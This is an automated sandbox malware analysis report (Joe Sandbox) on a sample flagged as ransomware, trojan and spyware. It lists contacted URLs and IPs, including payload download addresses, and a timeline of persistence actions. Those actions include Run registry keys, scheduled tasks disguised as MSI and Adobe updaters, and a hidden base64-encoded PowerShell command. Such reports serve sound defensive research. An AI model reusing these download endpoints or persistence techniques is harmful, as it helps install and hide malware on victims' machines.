                      https://ipinfo.io/?0YXJTGaxIrryNdvx7SKozTjt.exe, 00000013.00000002.2616507052.000000000104E000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://www.ecosia.org/newtab/_ebPmq_TcwNignYm0bf0ytJM.exe, 00000006.00000003.2402278722.0000000005B0D000.00000004.00000020.00020000.00000000.sdmp, _ebPmq_TcwNignYm0bf0ytJM.exe, 00000006.00000003.2408169925.0000000005C55000.00000004.00000020.00020000.00000000.sdmp, Zy329tNpRVznAcNUeSg4uGuQ.exe, 0000000A.00000003.2566151117.00000000061EE000.00000004.00000020.00020000.00000000.sdmp, Zy329tNpRVznAcNUeSg4uGuQ.exe, 0000000A.00000003.2567876023.00000000062A8000.00000004.00000020.00020000.00000000.sdmp, ZMyjNtrJZsXoQ4xLeKYzrWJD.exe, 0000000D.00000003.2409721916.0000000005EE8000.00000004.00000020.00020000.00000000.sdmp, ZMyjNtrJZsXoQ4xLeKYzrWJD.exe, 0000000D.00000003.2416728276.0000000005F89000.00000004.00000020.00020000.00000000.sdmp, EPA5EhRzK9ZnpAjdUqLJteUs.exe, 0000000F.00000003.2462518721.0000000001CB6000.00000004.00000020.00020000.00000000.sdmp, EPA5EhRzK9ZnpAjdUqLJteUs.exe, 0000000F.00000003.2455632811.00000000079C8000.00000004.00000020.00020000.00000000.sdmp, EPA5EhRzK9ZnpAjdUqLJteUs.exe, 0000000F.00000003.2602295483.0000000001CB6000.00000004.00000020.00020000.00000000.sdmp, EEmC0rfrxeQDEUW4Qmh7BQX4.exe, 00000014.00000003.2456079540.0000000002FCB000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brEPA5EhRzK9ZnpAjdUqLJteUs.exe, 0000000F.00000003.2610251801.0000000001C9D000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      http://176.111.174.109/pelikanfCHA0VZiz8y.exe, 00000000.00000003.2136279738.0000000002B19000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2124790795.0000000002B19000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2128621423.0000000002B19000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2134619151.0000000002B19000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2135718098.0000000002B19000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://stats.vk-portal.netCHA0VZiz8y.exe, 00000000.00000003.2189012972.0000000004B71000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2188863975.000000000441D000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://vk.com/browser_reports?dest=default_reportsCHA0VZiz8y.exe, 00000000.00000003.2189316455.00000000043C6000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://85.192.56.26/api/flash.phpt0YXJTGaxIrryNdvx7SKozTjt.exe, 00000013.00000002.2616507052.00000000010AE000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://st6-20.vk.com/css/al/common.cb94d05c.cssCHA0VZiz8y.exe, 00000000.00000003.2189012972.0000000004B71000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2188863975.000000000441D000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://st6-20.vk.com/css/al/vkui.c63ec9ec.cssCHA0VZiz8y.exe, 00000000.00000003.2189012972.0000000004B71000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2188863975.000000000441D000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://ipinfo.io/:Zy329tNpRVznAcNUeSg4uGuQ.exe, 0000000A.00000003.2719544361.00000000016A0000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://fleur-de-lis.sbs/rCHA0VZiz8y.exe, 00000000.00000003.2128621423.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2124790795.0000000002AF4000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://85.192.56.26/api/flash.phpDat0YXJTGaxIrryNdvx7SKozTjt.exe, 00000013.00000002.2616507052.00000000010AE000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://db-ip.com:443/demo/home.php?s=8.46.123.175Zy329tNpRVznAcNUeSg4uGuQ.exe, 0000000A.00000003.2719544361.00000000016A9000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://ipinfo.io/0YXJTGaxIrryNdvx7SKozTjt.exe, 00000013.00000002.2616507052.000000000104E000.00000004.00000020.00020000.00000000.sdmp, 0YXJTGaxIrryNdvx7SKozTjt.exe, 00000013.00000002.2616507052.00000000010AE000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://ipinfo.io/namehttps://ipgeolocation.io/statusCHA0VZiz8y.exe, 00000000.00000003.2052702628.0000000000400000.00000004.00001000.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://fleur-de-lis.sbs/zCHA0VZiz8y.exe, 00000000.00000003.2134619151.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2128621423.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2136279738.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2124790795.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2135718098.0000000002AF4000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBLEPA5EhRzK9ZnpAjdUqLJteUs.exe, 0000000F.00000003.2610251801.0000000001C9D000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://ipinfo.io/widget/demo/8.46.123.175Zy329tNpRVznAcNUeSg4uGuQ.exe, 0000000A.00000003.2719544361.00000000016A9000.00000004.00000020.00020000.00000000.sdmp, 0YXJTGaxIrryNdvx7SKozTjt.exe, 00000013.00000002.2616507052.000000000104E000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://ipinfo.io:443/widget/demo/8.46.123.175cZy329tNpRVznAcNUeSg4uGuQ.exe, 0000000A.00000003.2719544361.00000000016A9000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://185.172.128.159/dl.phpPCHA0VZiz8y.exe, 00000000.00000003.2136279738.0000000002B19000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2124790795.0000000002B19000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2128621423.0000000002B19000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2134619151.0000000002B19000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2135718098.0000000002B19000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://monoblocked.com/525403/setup.exexeCHA0VZiz8y.exe, 00000000.00000003.2134619151.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2136279738.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2135718098.0000000002AF4000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://185.172.128.159/dl.phpOCHA0VZiz8y.exe, 00000000.00000003.2136279738.0000000002B19000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2124790795.0000000002B19000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2128621423.0000000002B19000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2134619151.0000000002B19000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2135718098.0000000002B19000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://ipinfo.io:443/widget/demo/8.46.123.175_0YXJTGaxIrryNdvx7SKozTjt.exe, 00000013.00000002.2616507052.000000000104E000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://ipinfo.io/https://ipgeolocation.io/::0YXJTGaxIrryNdvx7SKozTjt.exe, 00000013.00000003.2412636025.0000000002FA0000.00000004.00001000.00020000.00000000.sdmp, 0YXJTGaxIrryNdvx7SKozTjt.exe, 00000013.00000002.2613733095.000000000063D000.00000040.00000001.01000000.00000013.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://f.123654987.xyz/525403/setup.exeUCHA0VZiz8y.exe, 00000000.00000003.2159189354.00000000043F9000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: malware
                      unknown
                      https://lop.foxesjoy.com/CHA0VZiz8y.exe, 00000000.00000003.2134619151.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2128621423.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2136279738.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2124790795.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2135718098.0000000002AF4000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: malware
                      unknown
                      https://lop.foxesjoy.com/ssl/crt.exee-CHA0VZiz8y.exe, 00000000.00000003.2189147343.00000000043F9000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: malware
                      unknown
                      http://5.42.66.10/download/th/getimage15.phpwjCHA0VZiz8y.exe, 00000000.00000003.2124790795.0000000002ABD000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2128621423.0000000002ABD000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2134619151.0000000002AB5000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://st6-20.vk.com/css/al/fonts_cnt_async.4881739c.cssCHA0VZiz8y.exe, 00000000.00000003.2189012972.0000000004B71000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2188863975.000000000441D000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://kurd.computer:80/dll/builddoc.exeCHA0VZiz8y.exe, 00000000.00000003.2124790795.0000000002AF4000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://st6-20.vk.com/css/al/fonts_utf.7fa94ada.cssCHA0VZiz8y.exe, 00000000.00000003.2189012972.0000000004B71000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2188863975.000000000441D000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://91.202.23CHA0VZiz8y.exe, 00000000.00000003.2136279738.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2135718098.0000000002AF4000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://monoblocked.com/525403/setup.exe&CHA0VZiz8y.exe, 00000000.00000003.2134619151.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2136279738.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2135718098.0000000002AF4000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://85.192.56.26/api/flash.phpxB0YXJTGaxIrryNdvx7SKozTjt.exe, 00000013.00000002.2616507052.000000000104E000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://ocsp.sectigo.com0CHA0VZiz8y.exe, 00000000.00000003.2164957983.00000000065E5000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2165595509.0000000006B12000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://fleur-de-lis.sbs/post/File_294/setup294.exeCHA0VZiz8y.exe, 00000000.00000003.2134619151.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2136279738.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2135718098.0000000002AF4000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://api.myip.com/O0YXJTGaxIrryNdvx7SKozTjt.exe, 00000013.00000002.2616507052.0000000000FF8000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://ns.adobe.0/xmp_ebPmq_TcwNignYm0bf0ytJM.exe, 00000006.00000003.2424687708.0000000002B0B000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://monoblocked.com:80/525403/setup.exe1CHA0VZiz8y.exe, 00000000.00000003.2134619151.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2128621423.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2136279738.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2124790795.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2135718098.0000000002AF4000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://5.42.66.10/download/123p.exelCHA0VZiz8y.exe, 00000000.00000003.2136279738.0000000002B19000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2124790795.0000000002B19000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2128621423.0000000002B19000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2134619151.0000000002B19000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2135718098.0000000002B19000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://85.192.56.26:80/api/flash.phpso0YXJTGaxIrryNdvx7SKozTjt.exe, 00000013.00000002.2616507052.000000000103C000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=_ebPmq_TcwNignYm0bf0ytJM.exe, 00000006.00000003.2402278722.0000000005B0D000.00000004.00000020.00020000.00000000.sdmp, _ebPmq_TcwNignYm0bf0ytJM.exe, 00000006.00000003.2408169925.0000000005C55000.00000004.00000020.00020000.00000000.sdmp, Zy329tNpRVznAcNUeSg4uGuQ.exe, 0000000A.00000003.2566151117.00000000061EE000.00000004.00000020.00020000.00000000.sdmp, Zy329tNpRVznAcNUeSg4uGuQ.exe, 0000000A.00000003.2567876023.00000000062A8000.00000004.00000020.00020000.00000000.sdmp, ZMyjNtrJZsXoQ4xLeKYzrWJD.exe, 0000000D.00000003.2409721916.0000000005EE8000.00000004.00000020.00020000.00000000.sdmp, ZMyjNtrJZsXoQ4xLeKYzrWJD.exe, 0000000D.00000003.2416728276.0000000005F89000.00000004.00000020.00020000.00000000.sdmp, EPA5EhRzK9ZnpAjdUqLJteUs.exe, 0000000F.00000003.2462518721.0000000001CB6000.00000004.00000020.00020000.00000000.sdmp, EPA5EhRzK9ZnpAjdUqLJteUs.exe, 0000000F.00000003.2607403739.0000000001C9F000.00000004.00000020.00020000.00000000.sdmp, EPA5EhRzK9ZnpAjdUqLJteUs.exe, 0000000F.00000003.2608954397.0000000001CA9000.00000004.00000020.00020000.00000000.sdmp, EPA5EhRzK9ZnpAjdUqLJteUs.exe, 0000000F.00000003.2455632811.00000000079C8000.00000004.00000020.00020000.00000000.sdmp, EPA5EhRzK9ZnpAjdUqLJteUs.exe, 0000000F.00000003.2602295483.0000000001CB6000.00000004.00000020.00020000.00000000.sdmp, EEmC0rfrxeQDEUW4Qmh7BQX4.exe, 00000014.00000003.2456079540.0000000002FCB000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      http://85.192.56.26/api/flash.php0YXJTGaxIrryNdvx7SKozTjt.exe, 00000013.00000002.2616507052.00000000010AE000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: malware
                      unknown
                      https://st6-20.vk.comCHA0VZiz8y.exe, 00000000.00000003.2189012972.0000000004B71000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2188863975.000000000441D000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      http://5.42.66.10/download/th/retail.phphpbCHA0VZiz8y.exe, 00000000.00000003.2134619151.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2128621423.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2136279738.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2124790795.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2135718098.0000000002AF4000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://monoblocked.com/CHA0VZiz8y.exe, 00000000.00000003.2135718098.0000000002AF4000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://db-ip.com/demo/home.php?s=8.46.123.175oZy329tNpRVznAcNUeSg4uGuQ.exe, 0000000A.00000003.2719544361.00000000016C0000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://aka.ms/dotnet-core-applaunch?CHA0VZiz8y.exe, 00000000.00000003.2138600045.000000000441E000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2139765657.0000000004420000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2138058247.0000000004B51000.00000004.00000020.00020000.00000000.sdmp, FIxDICT7hSLYFeTzbHHqKZ7Z.exe, 00000012.00000000.2266954848.00007FF762EB9000.00000002.00000001.01000000.00000011.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      http://www.openssl.org/support/faq.html7U1bGcxK3Lqi_XMHDNEdJrhB.exe, 00000007.00000002.2311839298.0000000002210000.00000040.00001000.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      https://monoblocked.com/525403/setup.exeCHA0VZiz8y.exe, CHA0VZiz8y.exe, 00000000.00000003.2134619151.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2134495582.00000000043F9000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2144743645.00000000043F9000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2189147343.00000000043F9000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2140216516.00000000043F9000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2159189354.00000000043F9000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2136279738.0000000002AF4000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2138181954.00000000043F9000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2166181794.00000000043F9000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2135718098.0000000002AF4000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: malware
                      unknown
                      http://176.111.174.109/pelikanCHA0VZiz8y.exe, 00000000.00000003.2124790795.0000000002B19000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2128621423.0000000002B19000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2134619151.0000000002B19000.00000004.00000020.00020000.00000000.sdmp, CHA0VZiz8y.exe, 00000000.00000003.2135718098.0000000002B19000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: malware
                      unknown
                      • No. of IPs < 25%
                      • 25% < No. of IPs < 50%
                      • 50% < No. of IPs < 75%
                      • 75% < No. of IPs
                      IPDomainCountryFlagASNASN NameMalicious
                      34.117.186.192
                      unknownUnited States
                      139070GOOGLE-AS-APGoogleAsiaPacificPteLtdSGfalse
                      85.192.56.26
                      unknownRussian Federation
                      12695DINET-ASRUfalse
                      185.172.128.159
                      unknownRussian Federation
                      50916NADYMSS-ASRUfalse
                      37.221.125.202
                      unknownLithuania
                      62416PTSERVIDORPTfalse
                      104.102.42.29
                      unknownUnited States
                      16625AKAMAI-ASUSfalse
                      65.109.242.59
                      unknownUnited States
                      11022ALABANZA-BALTUSfalse
                      185.172.128.170
                      unknownRussian Federation
                      50916NADYMSS-ASRUfalse
                      95.142.206.0
                      unknownRussian Federation
                      47541VKONTAKTE-SPB-AShttpvkcomRUfalse
                      95.142.206.2
                      unknownRussian Federation
                      47541VKONTAKTE-SPB-AShttpvkcomRUfalse
                      95.142.206.1
                      unknownRussian Federation
                      47541VKONTAKTE-SPB-AShttpvkcomRUfalse
                      104.21.63.150
                      unknownUnited States
                      13335CLOUDFLARENETUSfalse
                      5.42.67.8
                      unknownRussian Federation
                      39493RU-KSTVKolomnaGroupofcompaniesGuarantee-tvRUfalse
                      147.45.47.149
                      unknownRussian Federation
                      2895FREE-NET-ASFREEnetEUfalse
                      147.45.47.126
                      unknownRussian Federation
                      2895FREE-NET-ASFREEnetEUfalse
                      176.111.174.109
                      unknownRussian Federation
                      201305WILWAWPLfalse
                      172.67.75.166
                      unknownUnited States
                      13335CLOUDFLARENETUSfalse
                      87.240.132.67
                      unknownRussian Federation
                      47541VKONTAKTE-SPB-AShttpvkcomRUfalse
                      172.67.75.163
                      unknownUnited States
                      13335CLOUDFLARENETUSfalse
                      5.42.65.115
                      unknownRussian Federation
                      39493RU-KSTVKolomnaGroupofcompaniesGuarantee-tvRUtrue
                      91.202.233.232
                      unknownRussian Federation
                      9009M247GBfalse
                      5.42.65.116
                      unknownRussian Federation
                      39493RU-KSTVKolomnaGroupofcompaniesGuarantee-tvRUfalse
                      5.42.66.10
                      unknownRussian Federation
                      39493RU-KSTVKolomnaGroupofcompaniesGuarantee-tvRUfalse
                      188.114.97.3
                      unknownEuropean Union
                      13335CLOUDFLARENETUSfalse
                      146.70.56.165
                      unknownUnited Kingdom
                      2018TENET-1ZAfalse
                      103.146.158.221
                      unknownunknown
                      135763GAYATRI-ASGAYATRICOMMUNICATIONSINfalse
                      104.21.4.208
                      unknownUnited States
                      13335CLOUDFLARENETUSfalse
                      45.130.41.108
                      unknownRussian Federation
                      198610BEGET-ASRUfalse
                      Joe Sandbox version:40.0.0 Tourmaline
                      Analysis ID:1447491
                      Start date and time:2024-05-25 09:30:08 +02:00
                      Joe Sandbox product:CloudBasic
                      Overall analysis duration:0h 13m 19s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Cookbook file name:default.jbs
                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                      Number of analysed new started processes analysed:46
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:0
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Sample name:CHA0VZiz8y.exe
                      renamed because original name is a hash value
                      Original Sample Name:f0587649682207064554a2372966435d.exe
                      Detection:MAL
                      Classification:mal100.rans.troj.spyw.evad.winEXE@110/214@0/27
                      EGA Information:
                      • Successful, ratio: 83.3%
                      HCA Information:
                      • Successful, ratio: 92%
                      • Number of executed functions: 120
                      • Number of non-executed functions: 282
                      Cookbook Comments:
                      • Found application associated with file extension: .exe
                      • Exclude process from analysis (whitelisted): Conhost.exe, dllhost.exe, SIHClient.exe
                      • Execution Graph export aborted for target CHA0VZiz8y.exe, PID 4120 because there are no executed function
                      • Not all processes where analyzed, report is missing behavior information
                      • Report creation exceeded maximum time and may have missing disassembly code information.
                      • Report size exceeded maximum capacity and may have missing behavior information.
                      • Report size exceeded maximum capacity and may have missing disassembly code.
                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                      • Report size getting too big, too many NtCreateFile calls found.
                      • Report size getting too big, too many NtDeviceIoControlFile calls found.
                      • Report size getting too big, too many NtOpenFile calls found.
                      • Report size getting too big, too many NtOpenKeyEx calls found.
                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                      • Report size getting too big, too many NtQueryAttributesFile calls found.
                      • Report size getting too big, too many NtQueryValueKey calls found.
                      • Report size getting too big, too many NtReadVirtualMemory calls found.
                      • Skipping network analysis since amount of network traffic is too extensive
                      TimeTypeDescription
                      03:31:21API Interceptor17x Sleep call for process: CHA0VZiz8y.exe modified
                      03:31:23API Interceptor1x Sleep call for process: A_22rjVO67ooiUk2ueyL6tMl.exe modified
                      03:31:26API Interceptor1124x Sleep call for process: kat806.tmp modified
                      03:31:29API Interceptor1x Sleep call for process: xS7PhKcNZTx4FuBAD1RB9kbJ.exe modified
                      03:31:36API Interceptor1x Sleep call for process: RPA18tS89oJgBrOTDKzODMll.exe modified
                      03:31:44API Interceptor1x Sleep call for process: 0YXJTGaxIrryNdvx7SKozTjt.exe modified
                      03:31:44API Interceptor38x Sleep call for process: RegAsm.exe modified
                      03:32:00API Interceptor13x Sleep call for process: EPA5EhRzK9ZnpAjdUqLJteUs.exe modified
                      09:31:36Task SchedulerRun new task: MPGPH131 HR path: C:\ProgramData\MPGPH131\MPGPH131.exe
                      09:31:37Task SchedulerRun new task: MPGPH131 LG path: C:\ProgramData\MPGPH131\MPGPH131.exe
                      09:31:37AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run RageMP131 C:\Users\user\AppData\Local\RageMP131\RageMP131.exe
                      09:31:54AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run SysHelper "C:\Users\user\AppData\Local\cd606818-a84b-463e-828b-b93214ba547c\7U1bGcxK3Lqi_XMHDNEdJrhB.exe" --AutoStart
                      09:32:02Task SchedulerRun new task: bTaQIouyLaJYQqQWth path: C:\Users\user\AppData\Local\Temp\7zSD75.tmp\Install.exe s>D1 /OEEdidhakB 525403 /S
                      09:32:02Task SchedulerRun new task: Time Trigger Task path: C:\Users\user\AppData\Local\cd606818-a84b-463e-828b-b93214ba547c\7U1bGcxK3Lqi_XMHDNEdJrhB.exe s>--Task
                      09:32:05AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run RageMP131 C:\Users\user\AppData\Local\RageMP131\RageMP131.exe
                      09:32:14Task SchedulerRun new task: gTKJqQCgO path: powershell s>-WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                      09:32:15AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run SysHelper "C:\Users\user\AppData\Local\cd606818-a84b-463e-828b-b93214ba547c\7U1bGcxK3Lqi_XMHDNEdJrhB.exe" --AutoStart
                      09:32:16Task SchedulerRun new task: MSIUpdaterV168_bdca866007fb255201297d2a15a49513 HR path: C:\ProgramData\MSIUpdaterV168_bdca866007fb255201297d2a15a49513\MSIUpdaterV168.exe
                      09:32:16Task SchedulerRun new task: MSIUpdaterV168_bdca866007fb255201297d2a15a49513 LG path: C:\ProgramData\MSIUpdaterV168_bdca866007fb255201297d2a15a49513\MSIUpdaterV168.exe
                      09:32:23AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run AdobeUpdaterV168_bdca866007fb255201297d2a15a49513 C:\Users\user\AppData\Local\AdobeUpdaterV168_bdca866007fb255201297d2a15a49513\AdobeUpdaterV168.exe
